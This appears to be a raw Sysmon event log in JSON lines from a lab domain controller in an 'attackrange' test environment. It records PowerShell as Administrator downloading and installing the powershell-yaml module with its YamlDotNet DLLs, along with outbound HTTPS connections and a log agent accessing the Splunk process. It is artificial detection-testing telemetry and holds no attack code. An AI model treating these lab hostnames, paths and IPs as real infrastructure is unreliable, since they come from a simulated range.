{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5178,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:09.570\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\lib\\netstandard1.3\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 06:55:09.570","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:09.570","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\lib\\netstandard1.3\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 06:55:09.570","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5179,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:09.586\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\lib\\net45\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 06:55:09.586","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:09.586","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\lib\\net45\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 06:55:09.586","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5180,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:09.586\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\Load-Assemblies.ps1\r\nCreationUtcTime: 2020-08-01 06:55:09.586","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:09.586","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\Load-Assemblies.ps1","CreationUtcTime":"2020-08-01 06:55:09.586","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5181,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:09.602\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\lib\\net35\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 06:55:09.602","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:09.602","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\lib\\net35\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 06:55:09.602","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5182,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:09.602\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\lib\\net45\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 06:55:09.602","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:09.602","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\lib\\net45\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 06:55:09.602","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5183,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:09.602\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\lib\\netstandard1.3\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 06:55:09.602","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:09.602","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\lib\\netstandard1.3\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 06:55:09.602","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5184,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:09.602\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\Tests\\powershell-yaml.Tests.ps1\r\nCreationUtcTime: 2020-08-01 06:55:09.602","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:09.602","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1557255992\\powershell-yaml\\Tests\\powershell-yaml.Tests.ps1","CreationUtcTime":"2020-08-01 06:55:09.602","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5185,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:07.334\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52662\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:07.334","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52662","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5186,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:07.650\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52663\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:07.650","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52663","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5187,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:10.055\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net35\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 06:55:10.055","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:10.055","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net35\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 06:55:10.055","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5188,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:10.070\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net45\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 06:55:10.070","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:10.070","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net45\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 06:55:10.070","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5189,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:10.070\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\netstandard1.3\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 06:55:10.070","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:10.070","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\netstandard1.3\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 06:55:10.070","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5190,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:10.070\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Tests\\powershell-yaml.Tests.ps1\r\nCreationUtcTime: 2020-08-01 06:55:10.070","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:10.070","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Tests\\powershell-yaml.Tests.ps1","CreationUtcTime":"2020-08-01 06:55:10.070","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5191,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:10.070\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Load-Assemblies.ps1\r\nCreationUtcTime: 2020-08-01 06:55:10.070","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:10.070","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Load-Assemblies.ps1","CreationUtcTime":"2020-08-01 06:55:10.070","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5192,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:10.524\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:10.524","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5193,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:08.225\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52664\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:08.225","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52664","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
